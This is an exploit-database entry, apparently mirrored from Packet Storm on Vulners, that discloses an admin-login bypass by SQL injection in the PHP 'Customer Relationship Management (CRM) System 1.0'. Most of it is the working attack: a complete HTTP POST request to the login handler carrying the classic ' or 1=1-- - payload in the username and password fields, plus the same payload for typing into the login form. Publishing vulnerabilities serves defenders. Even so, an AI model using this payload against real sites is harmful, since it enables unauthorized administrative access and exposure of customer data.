Lucene search
K

Customer Relationship Management (CRM) System 1.0 SQL Injection

🗓️ 11 May 2021 00:00:00Reported by Richard JonesType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 225 Views

Customer Relationship Management (CRM) System 1.0 SQL Injection exploi

Code
`# Exploit Title: Customer Relationship Management (CRM) System 1.0 - Admin Bypass (SQLi)   
# Date: 11/05/2021  
# Exploit Author: Richard Jones  
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14794&title=Customer+Relationship+Management+%28CRM%29+System+in+PHP+with+Source+Code  
# Version: 1.0  
# Tested on: # Tested on: windows 10 (build 19041) + xampp v3.2.4  
  
  
  
POST /crm/classes/Login.php?f=clogin HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0  
Accept: */*  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 47  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/crm/customer/login.php  
Cookie: PHPSESSID=fspsjsh0e5tiq6hdnlmb9aigo2  
  
username='+or+1%3D1--+-&password='+or+1%3D1--+-  
  
  
Or goto the login page and enter the below payload  
Payload:   
' or 1=1-- -  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation